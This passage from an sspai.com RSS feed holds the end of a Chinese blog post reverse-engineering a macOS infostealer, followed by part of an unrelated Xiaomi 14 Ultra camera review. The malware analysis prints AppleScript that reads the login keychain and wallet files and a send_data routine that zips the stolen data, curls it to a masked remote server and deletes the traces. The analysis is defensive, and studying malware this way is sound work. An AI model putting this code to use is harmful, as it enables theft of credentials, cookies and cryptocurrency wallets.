__ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEPKcm(&amp;local_60,&amp;DAT_100007f51,1);</code></pre><p style="margin-left: 0px;">这些函数名称是由 C++ 的名字修饰（Name Mangling）机制生成的，它用于在编译时将 C++ 代码中的函数名、参数类型等信息编码到生成的二进制文件中。这样做的目的是为了支持 C++ 的函数重载等特性。</p><p style="margin-left: 0px;">想象一下，你是一名考古学家，正在挖掘一个古老的文明遗址。在这个遗址中，你发现了一种特殊的象形文字，这就是我们所说的 C++ 的名字修饰（Name Mangling）。这种象形文字初看起来像是一堆难以解读的符号，但实际上每一个符号都蕴含了丰富的信息，比如历史人物的名字、事件的时间等。这些信息对于未经训练的眼睛来说可能难以识别，但对于经验丰富的考古学家来说，它们却能揭示出古文明的复杂性和精细之处。</p><p style="margin-left: 0px;">为了揭开这些函数名称的神秘面纱，我们使用一个特殊的解码器，也就是在线 C++ demangler 工具。这个工具可以把那些复杂的名字转换成我们能理解的普通语言。比如，一个看似复杂的函数名 <code>__Z10hex_decodePKc</code> 被翻译成了 <code>char* hex_decode(const char*)</code>，这告诉我们这个函数接受一个字符指针作为输入，返回一个字符指针。</p><p style="margin-left: 0px;">还需要对自动生成的一些变量和函数名进行重新命名，这样可以帮助我们更清晰地看到事情的全貌。</p><p>比如，第二个函数属于 C++ 标准库中的字符串处理部分。函数的作用是抛出一个长度错误，可以将其重命名为 <code>throwLengthError</code>。</p><p>第三个函数是用于连接两个字符串对象。正确调用形式如下：</p><pre class="language-null"><code>local_78 = "osascript -e \'" + local_48</code></pre><p>第四个函数与第二个函数一致。</p><p>第五个函数是向字符串的末尾添加字符。具体到这个函数，它接受两个参数：一个指向要添加的字符串指针；以及要添加的字符数量。正确调用形式如下：</p><pre class="language-null"><code>local_60.append(&amp;DAT_100007f51, 1);</code></pre><p>在人工进行粗略分析之后，对反编译窗口中自动生成的变量和函数进行重命名。这一步很重要，能帮助我们更好的理解代码逻辑。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/12/2837ed138afce8606b9e5beb4c9b8568.gif" /><figcaption>重命名后的 malTask 函数</figcaption></figure><p>分析恶意软件是一项耗时的工作，不要浪费时间在细枝末节上。再梳理完整段代码，关键函数部分如下：</p><pre class="language-null"><code>malware = (char *)hex_decode(hexcode);   

concatenateString(&amp;mal_script,"osascript -e \'",&amp;local_48);

uVar2 = _system((char *)ptr);
</code></pre><p>让我们来一起揭露这个恶意软件的恶行：</p><ol><li>首先使用了 <code>hex_decode</code> 这个函数，它解码了一串神秘的代码 <code>hexcode</code>，这些代码可能是用来执行恶意行为的。</li><li>然后，将解码后的内容与一段命令 <code>osascript -e '</code> 结合起来。这是一个用于在 Mac 电脑上执行脚本的命令，这样就形成了一个完整的恶意命令。</li><li>最后，用一个叫做 <code>_system</code> 的函数执行了这个命令，这就像是按下了启动犯罪计划的按钮。</li></ol><h3>核心恶意行为 🎯</h3><p>虽然到目前为止，我们已经了解了恶意软件的大致流程。但恶意软件的核心部分——神秘代码 <code>hexcode</code>，我们尚未清楚。</p><p>这就好比，在破解小偷犯罪计划书的侦探任务里，我们虽然已经对计划书进行了初步的破解，但是计划书的核心部分，如「犯罪目标 XXX，犯罪时间 XXX」仍然是一片迷雾。</p><p style="margin-left: 0px;">在我们的逆向任务里，恶意软件（「电子小偷」）也将它最核心的恶意行为，比如「发送一些重要的信息到某个地方」，用一种叫做<strong>「十六进制编码」的方法</strong>，写成一串看起来无意义的数字和字母。</p><p style="margin-left: 0px;">例如，原本的恶意行为可能是这样的：「把这个重要文件发送到这个地址」。但是通过十六进制编码，它变成了一串看起来像是乱码的文本。这样一来，即使有人偶然看到这些代码，也很难理解它们的真正意图。恶意软件在执行这个秘密计划之前，会先用一个「解码器」（本文中的<code>hex_decode</code>）把这些看似乱码的文本转换回原来的形式，确保计划能够顺利进行。</p><p style="margin-left: 0px;">回到我们的恶意软件中，如下所示，是<strong>「十六进制编码」后的恶意行为</strong>。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/12/9390dc1d24a63b356f199e4fab6f45cd.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>十六进制编码后的恶意代码</figcaption></figure><p style="margin-left: 0px;">恶意行为是用一种奇怪的符号（「十六进制编码」）写的。这些符号看起来像是随机的数字和字母，但其实每一组符号都代表了不同的字符。这时候，需要用一个「解码器」来把这些符号转换成可读的文字或者指令。</p><p style="margin-left: 0px;">很简单，这里的「解码器」就是一个十六进制解码器。将编码为十六进制的数据根据 ASCII 编码表进行的转换，转换回其原始字符的过程，而<strong>原始的数据就是真正的恶意代码</strong>。</p><blockquote><p style="margin-left: 0px;">ASCII（American Standard Code for Information Interchange，美国信息交换标准代码）是一种字符编码标准，用于表示文本在计算机、通讯设备和其他使用文本的设备中。它主要用于显示现代英语和其他西欧语言。</p><p style="margin-left: 0px;">ASCII 编码将每个字符映射到一个从 0 到 127 的数字。例如，十六进制的 61 转换为十进制是 97，而在 ASCII 编码中，97 对应于小写的 'a'。这种编码方式广泛用于计算机科学和数据处理领域，因为它简单且广泛支持。</p></blockquote><p style="margin-left: 0px;">比如，上图中的 <code>6f 6e 20 6d 6b 64 69 72 28 73 6f 6d 65 49 74 65 6d 29 0</code> 等同于 <code>on mkdir(someItem)</code>。这里，每个十六进制数都对应一个字符，比如 <code>6f</code> 对应字母 <code>o</code>，最后一个 <code>0</code> 表示一个空字符，在字符串的编码中用作终止符。</p><p style="margin-left: 0px;">如下所示，这就是恶意软件最终的目的！</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/14/609dccb5ad8d5970884186eebabeeaec.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>恶意脚本</figcaption></figure><p>在这个恶意脚本里面定义了很多函数，我已经对其中一些辅助函数的功能进行了注释。下面，我将简要介绍一下函数。</p><p><strong>收集系统信息：</strong><code><strong>userinfo</strong></code><strong> 函数</strong></p><pre class="language-null"><code>on userinfo(writemind)
try
set result to (do shell script "system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType")
writeText(result, writemind &amp; "user")
end try
end userinfo</code></pre><p>收集 Mac 电脑的软件、硬件和显示器信息。</p><p style="margin-left: 0px;">收集系统信息：</p><ul><li>使用 <code>system_profiler</code> 命令来获取系统信息。<code>system_profiler</code> 是一个强大的命令行工具，用于显示关于 Mac 系统的详细配置和硬件信息。</li><li><code>SPSoftwareDataType</code>、<code>SPHardwareDataType</code> 和 <code>SPDisplaysDataType</code> 是指定给 <code>system_profiler</code> 的参数，分别表示收集关于系统软件、硬件以及显示设备的信息。</li></ul><p style="margin-left: 0px;">存储系统信息：</p><ul><li>将 <code>system_profiler</code> 命令的输出存储在变量 <code>result</code> 中。</li><li>使用 <code>writeText</code> 函数将 <code>result</code> 的内容写入到文件中。目标文件路径由 <code>writemind</code> 和字符串 <code>"user"</code> 组合而成，从而形成完整的文件路径（例如，如果 <code>writemind</code> 是 <code>/tmp/xuyna/</code>，则文件路径将是 <code>/tmp/xuyna/user</code>）。</li></ul><p><strong>复制桌面数据：</strong><code><strong>deskwallets</strong></code><strong> 函数</strong></p><p>收集 Mac 电脑多种类型的加密货币钱包数据。具体的钱包数据类型和路径存储在 <code>walletMap</code> &nbsp;变量中，包括：</p><ul><li><strong>Electrum</strong>：是一个比特币钱包。</li><li><strong>Coinomi</strong>：是支持多种加密货币的钱包。</li><li><strong>Exodus</strong>：是一个用户友好的多加密货币钱包。</li><li><strong>Atomic</strong>：是支持多种加密货币的钱包。</li><li><strong>Wasabi</strong>：是一个注重隐私的比特币钱包。</li><li><strong>Ledger Live</strong>：是硬件钱包 Ledger 的官方桌面应用程序。</li><li><strong>Feather</strong>：是 Monero（一种加密货币）的轻量级钱包。</li></ul><p><strong>文件收集器：</strong><code><strong>filegrabber</strong></code><strong> 函数</strong></p><p style="margin-left: 0px;">收集 Safari 浏览器的 Cookies、Apple 备忘录的数据库文件、桌面目录下的文件和文档目录下文件。</p><p style="margin-left: 0px;"><strong>处理基于 Chromium 的浏览器的数据：</strong><code><strong>chromium</strong></code><strong> 函数</strong></p><p>针对 Chromium 系列浏览器（如 Chrome、Brave、Edge 等）并从这些配置文件中提取特定的数据，如 Cookies、登录数据、网站数据等。</p><p><strong>解析Firefox数据：</strong><code><strong>parseFF</strong></code><strong> 函数</strong></p><p>收集 Firefox 浏览器的用户数据。</p><p><strong>获取密码：</strong><code><strong>getpwd</strong></code><strong> 函数</strong></p><p style="margin-left: 0px;">收集密码信息。这个函数的行为涉及到两种情况：尝试从系统中直接提取密码，如果失败，则提示用户输入密码。</p><p><strong>收集用户的个人数据</strong></p><p>如下两行代码调用自定义的 <code>readwrite</code> 函数收集用户个人信息。</p><pre class="language-null"><code>readwrite(library &amp; "Binance/app-store.json", writemind &amp; "deskwallets/Binance/app-store.json")
readwrite(profile &amp; "/Library/Keychains/login.keychain-db", writemind &amp; "keychain")</code></pre><ul><li><code>library</code> 变量指向用户的「Application Support」目录（如「/Users/username/Library/Application Support/」），</li><li>「Binance/app-store.json」是 Binance 应用的一个配置或数据文件</li><li><code>profile</code> 变量指向用户的个人目录（如「Users/username」），</li><li>「/Library/Keychains/login.keychain-db」是 macOS 的关键链数据库文件，通常包含用户的密码和其他敏感的认证信息。</li></ul><p><strong>发送数据：</strong><code><strong>send_data</strong></code><strong> &nbsp;函数</strong></p><p>该函数用于将收集到的数据打包并发送到远程服务器。</p><pre class="language-null"><code>on send_data(writemind, uuid, userme)
do shell script "ditto -c -k --sequesterRsrc " &amp; writemind &amp; " /tmp/out.zip"
do shell script ("curl -X POST -H \"uuid: " &amp; uuid &amp; "\" -H \"user: " &amp; userme &amp; "\" --data-binary @/tmp/out.zip http://*.*.*.*:443/p2p")
do shell script "rm -r " &amp; writemind
do shell script "rm /tmp/out.zip"
end send_data</code></pre><ul><li>使用 <code>ditto </code>命令压缩 <code>writemind</code> 目录到 <code>/tmp/out.zip</code>。<code>ditto </code>是一个 MacOS 命令行工具，用于复制文件和目录，这里用于创建zip压缩文件。</li><li>使用<code>curl</code>命令通过HTTP POST请求发送压缩文件到指定的服务器地址（<code>http://*.*.*.*:443/p2p</code>），同时附带 <code>uuid</code> 和 <code>userme</code> 作为 HTTP 头部信息。</li><li>删除 <code>writemind&nbsp;</code> 目录和 <code>/tmp/out.zip&nbsp;</code> 文件，清理痕迹。</li></ul><p style="margin-left: 0px;">总而言之，上述代码的目的是在不引起用户注意的情况下，悄悄收集用户的个人信息、浏览器数据、文件等，在 <code>send_data</code> 中将这些信息发送到攻击者控制的服务器。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/14/8590ad23fc836f6bbbfebb5ba567e173.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>恶意软件窃取的信息</figcaption></figure><p style="margin-left: 0px;">到此为止，我们的解析过程就结束了。</p><h2 style="margin-left: 0px;">小结 🎗️</h2><p style="margin-left: 0px;">当我把解析出来的恶意代码脚本发送给我的朋友后，朋友看到一半就啪给关了，美其名曰「越看心越凉，不如当鸵鸟 🐦。」</p><p style="margin-left: 0px;">在我们这个日益数字化的世界中，恶意软件已经成为一种越来越普遍的威胁，它不仅威胁到个人的数据安全，也对企业和国家的安全构成了严重的挑战。我希望通过这篇文章，提醒大家，在日常生活中要保持警惕，<strong>恶意软件无处不在，法外狂徒四处横行</strong>。不要随意点击不明链接或下载来源不明的文件，这些都是恶意软件常见的传播途径。</p><p style="margin-left: 0px;">&gt; 下载少数派&nbsp;<a href="https://sspai.com/page/client">客户端</a>、关注&nbsp;<a href="https://sspai.com/link?target=https%3A%2F%2Fwww.xiaohongshu.com%2Fuser%2Fprofile%2F63f5d65d000000001001d8d4" target="_blank">少数派小红书</a>，感受精彩数字生活 🍃</p><p style="margin-left: 0px;">&gt; 实用、好用的&nbsp;<a href="https://sspai.com/mall">正版软件</a>，少数派为你呈现 🚀</p>
                ]]>
            </content:encoded>
        </item>
        
        <item>
            <id>https://sspai.com/post/88067</id>
            <title>有瑕疵的旅途伴侣：小米 14 Ultra 旅拍体验</title>
            <link>https://sspai.com/post/88067</link>
            <guid isPermaLink="false">https://sspai.com/post/88067</guid>
            <pubDate></pubDate>
            <updated>Tue, 16 Apr 2024 03:37:06 GMT</updated>
                
                
            <content:encoded>
                <![CDATA[
                    
                        <div> 关键词: Matrix, 小米 14 Ultra, 摄影, 手机
<br>
<br>
总结: 本文介绍了作者购入小米 14 Ultra手机的原因和体验，主要包括手机摄影功能的优点和缺点，以及与小米 14和14 Pro的比较。作者认为小米 14 Ultra在差异化和泛用性方面表现出色，适合需要更强影像素质和长焦功能的用户。 </div>
                        <hr>
                    
                    <p style="margin-left: 0px;"><strong>Matrix 首页推荐</strong>&nbsp;</p><p style="margin-left: 0px;"><a href="https://sspai.com/matrix">Matrix</a>&nbsp;是少数派的写作社区，我们主张分享真实的产品体验，有实用价值的经验与思考。我们会不定期挑选 Matrix 最优质的文章，展示来自用户的最真实的体验和观点。</p><p style="margin-left: 0px;">文章代表作者个人观点，少数派仅对标题和排版略作修改。</p><p>本文首发于作者的个人博客 <a href="https://sqybi.com/">SQYBI.com</a>，<a href="https://sqybi.com/blog/xiaomi-14-ultra-photography-experience-summary/">原文链接</a>。</p><p>文章中包括题图在内的所有照片，如无特殊标注，均为小米 14 系列手机拍摄直出，除裁剪外没有任何调整。少量照片受限于拥有的设备数量，使用其它手机或相机拍摄。</p><hr /><p>在一个多月之前，我入手了小米 14 Ultra（和它的摄影手柄套装），替换掉了手里的小米 12 Pro。</p><p>一方面，我之前的手机性能着实差了一些，一些你们都懂的游戏掉帧严重，特别是在同时还打开了微信视频的情况下更是如此，是时候更新换代了。</p><p>另一方面，上一代小米 13 Ultra 专注于摄影的思路着实有点打动我，不过我当时也看到了这台手机设计上存在的一些问题，所以没有入手。而这次的发布会上，能够感觉到之前的这些问题特别是重心问题在 14 Ultra 上已经有了很大改善。</p><p>此外，我最近也是越来越体会到旅游时并非每一天每一刻都适合随身携带相机。而现在的手机摄影已经相当成熟，可以作为非正式出片时相机的良好补充。这让我有越来越强烈的需求，想要持有一款影像素质更强的手机。</p><p>所有这些原因叠加在一起，我决定首发购入小米 14 Ultra。恰逢最近有一些工作上的变动，正好有了一个接近两周的假期可以去日本旅游，我也在这个过程中深度体验了这款手机的优缺点。</p><p>总的来说，这款手机的优点颇多，基本上和各类软文或者非软文的评测一样，无论是大光圈、大底带来的暗光表现，还是徕卡影调带来的一键出片效果（调教得真的很棒！），以及视频拍摄上的种种优化，只要是用过这款手机的人基本都会认同。</p><p>所以，接下来的文章内容可能会主要集中在手机的部分小缺点上。这并非意味着它不是一款出色的手机，但这款手机过于专注于特定的用途，以至于它并不适合所有人，或者说甚至不适合大多数人。如果你是它的目标用户，那么这些缺点多多少少都是可以忍受的；但如果你不是它的目标用户，那么这些缺点的任何一个都有可能成为在使用体验上压倒你的最后一棵稻草。</p><p>适合的才是最好的。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/16/087bbb8ceef70ca4492df5063c2f28d4.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>小米 12 Pro 和 14 Ultra 的对比，传承下来的仿皮材质——使用 iPhone 拍摄</figcaption></figure><h2>在小米 14 系列中做出选择</h2><p>首先要提的是，选择小米系列而不是同样专注于影像旗舰的 OPPO / vivo，肯定是有我多年都在使用小米的原因所在——迁移数据毕竟是很痛苦的事情。</p><p>但是前几年经历了把数据和应用迁移到 iPhone 又迁移回来，我依旧还在使用小米手机，自然也是因为它的产品定位和我足够契合：不一定有特别的亮点，但一定是短板足够长的水桶。</p><p>所以这里我们不会聊品牌之间的选择，而是更主要聊一下我为什么在小米的三台新机中选择了 14 Ultra，而非 14 或 14 Pro。</p><h3>小米 14，小屏机的旗舰</h3><p>首先说一下小米 14 这台小屏机。在小屏机这个相对小众的市场上，小米可谓杀出了一条血路。这次的小米 14 从各种配置和设计上，在保证了整体小巧的情况下，可以说和 14 Pro 不相上下，我甚至差一点就没等到 14 Ultra 发布，而是直接入手了这台机器；当然最后还是忍住了。</p><p>我这次一起出行的朋友中，就有一位使用小米 14 作为主力机的摄影爱好者。整体来看，虽然小米 14 的主摄没有一英寸底，但是实际夜景表现也并没有相差太多。而长焦段的 JN1 传感器和 14 Ultra 长焦使用的 IMX858 更是并没有可以明确体验到的差别，我们这两台手机的长焦端成像效果至少在手机屏幕上看起来半斤八两。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/16/c853d3371eda50677dd9e24ec6e38321.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>3.2x 长焦端的效果，不同型号的两款传感器在白天的亮度条件下并不会有明显区别</figcaption></figure><p>小米 14（也包括 14 Pro）在旅行摄影上的唯一不足，可能就是缺少一个 100mm 以上焦段的长焦了。但其实如果只是发发朋友圈，75mm 左右焦段的 3x 长焦加上裁切，也足以应付绝大部分情况。</p><p>所以<strong>如果不是强烈需要将手机作为相机的代替，那么小米 14 将是我最推荐的日常机，没有之一</strong>。</p><h3>小米 14 Pro，大屏真的是优势吗</h3><p>而说到小米 14 Pro，高情商的说法是，14 Pro 拥有和 14 几乎一样的配置和性能，是提供给非小屏爱好者的选择。低情商的说法嘛，那就是 14 Pro 作为一个大屏机，几乎没有什么能和 14 拉开差距的配置。</p><p>甚至写到这里的时候，我都不知道这台机器还有什么可以说的优点。</p><p>反正我肯定是更心动小屏的，所以见仁见智吧。</p><h3>小米 14 Ultra，差异化和泛用性</h3><p>和 14 Pro 不同，14 Ultra 则是做出了足够的差异化。一方面，几颗镜头更大的光圈和主摄的一英寸大底，虽说绝大多数场景下的拍摄体验上并不一定能带来肉眼可见的提升，但至少从参数上给人一种「我拍的照片更好了」的感觉。另一方面，增加的 5x 长焦提供了旅行中常用的最长焦段视角和压缩感，而稍微更广一些的广角端……我自己比较菜，是不怎么知道如何使用广角端的，但是广角这东西确实每一毫米都有它的作用，所以应该有人可以无视这颗广角令人发指的畸变把它用好吧。</p><p>14 Ultra 相比 13 Ultra 的一个重要优化是修改了之前头重脚轻的重心设计。我虽然没有购买 13 Ultra，但是也去小米之家摸过不少次，只能说但凡还想日常把手机当一个手机来使用的话，就绝对不应该入手 13 Ultra。而 14 Ultra 的改动则令人欣喜：虽然摄像头模组依旧巨大，但是现在手机整体的重心合理，甚至镜头下方能够成为一个很好的手指支撑点。</p><p>当然作为一个纯粹的手机，我认为 14 Ultra 大镜头模组导致的问题依旧存在，例如整体重量依旧很重、容易摸脏镜头，横握的时候非常难受等等。我也不会推荐购买这台手机之后，把它纯粹地当作一个手机使用。不过相比 13 Ultra，这一代现在至少已经是能用的程度了。</p><p>如果说还有什么令我浑身难受的缺点，那或许就是这套镜头模组防抖系统的晃动问题。虽然心里知道这是正常的，也知道实际使用上不会有问题，但这套防抖的晃动幅度还是让人难以习惯，反正我是真的没有见过第二台防抖系统有这么大晃动噪音的手机或者相机了。</p><p>说得夸张一点，如果你在自习室里摇晃手机，我很怀疑旁边的同学会因为防抖系统产生的咔哒声把你轰出去。</p><h3>如何在三款手机中进行选择</h3><p>所以总的来说，我认为在这三台手机之间选择，只需要遵循如下方案：</p><ol><li>首先确认你是不是一个需要手机作为相机在某些场景下替代的摄影爱好者，而非只想用手机记录下生活中的某些画面。如果你的目的是使用手机替代相机的话，那就可以考虑 14 Ultra；但如果不是，那么我觉得购入 14 Ultra 的意义不大。</li><li>当你是一个小屏爱好者的时候，优先考虑 14。或者说，你都是小屏爱好者了，还有什么理由不选择 14 呢？</li><li>如果你不喜欢小屏，但也不会拿手机当相机重度使用的时候，可以考虑 14 Pro。</li></ol><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/15/8d1473c07fc5257db957a5330f3806fb.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>作为相机补充的时候，小米 14 Ultra 或许是合适的选项</figcaption></figure><h2>摄影手柄体验</h2><p>不得不说，这次的摄影手柄还是很吸引眼球的。可实际体验下来，我觉得摄影手柄并没有想象中那么好用。</p><h3>摄影手柄的最大优点</h3><p>首先是优点，调节拨轮和拨杆真的很爽！我使用的配置是调节拨轮用来调节 EV，而调节拨杆则是配置成了分段调节镜头倍率。也就是说拨动拨杆的时候，焦段会在 0.5x、1x、2x、3.2x 和 5x 间调节，而非无级调节，这也符合我使用变焦镜头的习惯，大部分场景下只固定在若干个焦距上，如果要裁切的话后期回来再说。我个人比较推荐无论是相机还是手机，在入门阶段都尽可能地这样使用变焦镜头，以快速熟悉各个焦段的画面范围、压缩感和距离感，为过渡到定焦头打好基础。</p><p>但是仔细想想，这一定程度上也是因为小米的相机软件界面调整 EV 和焦距的操作并不舒适。特别是在这一代的徕卡调色下，正确调整 EV 是拍摄时的重中之重，而 EV 的调整竟然要手动在一个远离快门的位置点击 + 拖动，甚至如果要退出调整的话还需要第二次点击！</p><h3>快门按钮不如点击屏幕</h3><p>手柄的快门按钮，则是我使用下来体验最差的功能。</p><p>键程长，触发力度大，左手本来为了避免挡住镜头就要虚握，而手柄本身的仿皮材质很滑，这一系列原因导致按快门的过程几乎一定会导致相机向下移动一小段距离，偏离一开始的构图。</p><p>也正是因为如此，在使用手柄的时候，我几乎还是会点击屏幕来触发快门。这可以说是这款手柄最糟糕的一个设计了。</p><h3>手柄设计中的其它亮点</h3><p>除了按钮和拨杆以外，这款手柄的设计还是有一些其它亮点的。</p><p>首先这款手柄是搭配了一个专门的仿皮手机壳使用的，这款手机壳背后有一个镂空的小洞，用来适配手柄锁死的卡扣。而这个洞的位置，恰好可以露出手机背板上的小米 logo——相信所有第一次装上这个手机壳的同学，看到这个小洞的时候都会会心一笑。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/16/4bb2419aaca144557e4583d777f4dcd1.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>恰好可以露出手机 Logo 的小洞，也是手柄的卡扣位</figcaption></figure><p>另外，这款手机壳背后的摄像机模组周围，有一个可以拆卸的金属环。这个金属环除了可以换成其它颜色（我购买的白色手机壳，自带了银色和金色的环），最主要的一个功能是可以更换成滤镜转接环，直接转接相机滤镜！虽然我一次也没有用上过，但是这应该就属于「我可以不用但你最好能有」的功能了吧。再退一步，就算真的不用，至少能换成金色金属环也是炫耀感满满的。</p><h3>一贯糟糕的品控</h3><p>说完功能设计上的特点，就不得不聊一聊这款手柄的糟糕品控了。首批品控不行，也是很多小米供应链产品的通病。</p><p>我是和手机一起购入的手柄，所以拿到的应该也是最早的那一批次产品。结果在使用过程中，就遇到了各种各样的品控问题。</p><p>首先是一个没那么多人提到的问题，那就是上面提到的可拆卸金属环在拆卸的时候非常紧。这款金属环的拆装方式有点类似于相机镜头：有一个解锁按钮，在按下的状态可以旋转金属环将其拆下；而安装的时候则是旋转到按钮位置就可以咔哒一声卡死。</p><p>而我遇到的问题简单来说，就是这个按钮的固定装置过紧了。当手机壳装在手机上的时候，因为本身和手机之间有一定的缝隙，所以即便用再大的力气按这个按钮，手机壳本身的变形也会导致没有办法按到底，从而根本没办法解锁金属环！而拆下手机壳之后，也需要用另一个手指顶着按钮后面，同时用很大的力气按住按钮，才能拧下金属环。</p><p>我也看到一些网上的评论提到他们的金属环遇到了相反的品控问题，就是太松了导致没有拆卸就会有一定的晃动。小米啊，你可长点心吧……</p><p>第二个问题就是很多评测中都提到的电池充电逻辑问题了：摄影手柄会优先给手机充电，这就导致手机电量不足 80% 的时候，摄影手柄会持续给手机充电直到自己的电量耗尽。而手柄并没有预留另一块电池给自己的正常功能，从而会发现出去拍了没多一会儿，手柄就失灵了。</p><p>据说这个问题在新的固件中有所改善，前几天固件刚刚推送了。而因为后面的文章中会提到的一些原因，我没能在这次的旅行中体验到这个问题是否已经解决，只能等后续的机会了。</p><p>第三个问题则是断连，这个问题也有很多人报过了，我也是万万没想到 Type-C 口的连接竟然也有断连问题。使用中需要通过重新插拔手柄解决，且似乎有少量几率需要多次插拔，不知道是不是我使用的姿势问题。因为手柄本身有一个卡扣（也不知道有卡扣怎么还断连？），每次插拔要解锁再锁上，还是蛮麻烦的。</p><p>第四个问题是最致命的问题，也是导致我这次旅行没能带上手柄的关键原因：在放置了一个礼拜没使用之后，手柄直接充不进去电了！</p><p>我在即将出发的时候才发现了这个问题，不光是手柄本体无法充电，将手柄连接手机的时候，手柄和手机都没有办法进入充电状态。</p><p>正因为如此，我在临出发前的那个晚上匆忙申请了小米的售后，并把手柄留在了家里让老婆帮我交给快递员。因为实在是太突然了，所以我甚至没来得及找到全部配件（指包装盒和另外的两个金属环），只留下了手机壳和手柄本体。</p><h3>令人惊喜的售后维修</h3><p>这个问题固然是令人烦恼的，但可能是小米也知道自己的手柄出了品控问题，所以维修的过程十分简单明了：直接给我寄了一套新的手柄套装回来。</p><p>我对这个维修结果还是很满意的，唯一可惜的是：早知道就不把配套手机壳还回去了，这个手机壳单卖也要 200 块钱呢。</p><p>这个新的手柄至少到现在为止还没有过断连。但是正如上文所说，我暂时也没有特别多的机会测试这个手柄的续航表现和稳定性，只能等待下次出门的机会了。</p><h3>最佳的第三方配件</h3><p>或许你已经看过<a href="https://www.bilibili.com/video/BV19Z421h7rA/">一些视频</a>，说小米 14 Ultra 的摄影套装后盖可以完美适配银鹭八宝粥的盖子。</p><p>我实际体验了一下，不仅仅是银鹭八宝粥，娃哈哈八宝粥的盖子也能完美适配！而且银鹭八宝粥的盖子是黑色的，而娃哈哈恰好是白色的，完美地对应上了摄影套装的两种颜色。</p><p>而使用了一段时间之后，不得不说这个严丝合缝的程度远远比品控出现问题的金属环好太多了，甚至到了我有一段时间每见到一个人都要把手机连着八宝粥盖子交给他把玩一番的程度。</p><p>这才是小米 14 Ultra 的最佳第三方配件啊！</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/16/b5fb2afedf1619ac4da6d52243f443b6.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>完美适配的镜头盖——使用相机拍摄</figcaption></figure><h2>摄影体验</h2><p>聊完这些杂七杂八的，终于要开始聊摄影体验了。</p><p>经过这一个多月的体验，我现在使用这台手机的方式已经基本固定下来了：使用默认拍照模式，选择合适的焦段，构图，略微调整 EV，偶尔根据情况选择焦点，拍照。</p><h3>过于复杂的专业模式和不够复杂的默认模式</h3><p>因为 JPEG 的后期空间确实不大，所以我一开始也尝试过使用专业模式拍摄，并储存 UltraRAW 图片。但是用过几次之后，我发现即使有摄影手柄，手机上实际可以使用的拨轮和拨杆数量还是太少了。而对于每个参数都需要精细调整的专业模式（基本等同于相机的 M 模式），在手机上操作的复杂度实在太高。</p><p>另外，我为了尝试 UltraRAW 也曾经把一张照片放到 Lightroom 里做了后期，结果发现自己后期的效果和当时直拍的徕卡影调几乎一模一样——可以说是我现在的后期技术还不错，和徕卡影调的效果不相上下；反过来也可以说徕卡影调和我的思路很一致，基本上就可以直接拿来用了。</p><p>所以后来我也开始放弃抵抗，直接使用默认模式拍照，除了 EV 以外基本什么都不调整，结果反而拍得更舒服了。有很多没有思考时间的抓拍场景都能拍下不错的照片，同时也能将更多的精力专注在如何构图上。同时，专业模式没有办法自动附加水印，可能也是我不想使用它的原因之一。</p><p>下面就是一张我在公交车上使用默认模式抓拍到的照片。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/14/0640c3e0fe6081066a2f1aa1ae151740.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>一张抓拍的照片，使用专业模式可能就会错过这个场景</figcaption></figure><p>当然反过来说，只需要调整 EV，也就意味着 EV 调整才是拍摄中的重中之重。你要根据照片希望体现的影调和照片中的高光与暗部表现，来决定提升或降低几档 EV。但毕竟需要调整地只有一个参数，所以已经是很容易上手的了。</p><p>此外，我还是希望小米可以在后续的固件迭代中，将直方图和斑马纹下放到默认模式。毕竟在手机屏幕上顶着大太阳看过曝和曝光不足的地方，有时候还是过于困难了一些。</p><h3>徕卡影调的暗部问题</h3><p>徕卡影调的调色方案，在我看来是在拉高对比度，压低高光且压低大部分颜色饱和度的同时，保留了红橙色调的饱和度。</p><p>这自然不是完美的，比如在一些光比很大的场景中，暗部经常会过黑。虽然导入到电脑上放大后发现真正黑成一坨的情况并不多见，但在手机屏幕上有的时候看起来还是很难受的。此外，有一些场景下高光部分恰好是红色的话，会导致对比度进一步拉大，从而暗部可能真的会过暗。</p><p>当然，如果是大逆光的话，也一样会出现类似的情况。不过本来逆光拍摄又想保留暗部就是不太正确的做法，更多情况下使用相机拍摄也一样要堆栈，放到手机上主体面积比较小的话很难触发 HDR，这里就不展开说了。</p><p>一个红色高光导致暗部过暗的例子可以见下面这张照片。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/14/05e9a43ab4f382258d6ca4462955be89.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>红色高光导致暗部过暗，部分人物的细节已经丢失</figcaption></figure><h3>主摄不如长焦？畸变和光圈的分析</h3><p>在这两周的拍摄过程之中，我还可以发现一个趋势：1x 主摄使用越来越少，3.2x 长焦使用越来越多。主摄裁切的 2x 和 5x 的长焦通常会作为补充，而 0.5x 的广角几乎没有使用过。</p><p>这个焦段的使用结果自然有我自己拍摄习惯的问题，比如我用 24-70 的镜头时大部分时间也是锁在 70mm 端的，偶尔用一用 35mm，24mm 也不太常用。但是在使用上，我觉得这次 1 英寸大底的主摄和 0.5x 广角镜头是存在一定问题的。</p><p>首先，即使是主摄镜头，畸变也过于严重。而 0.5x 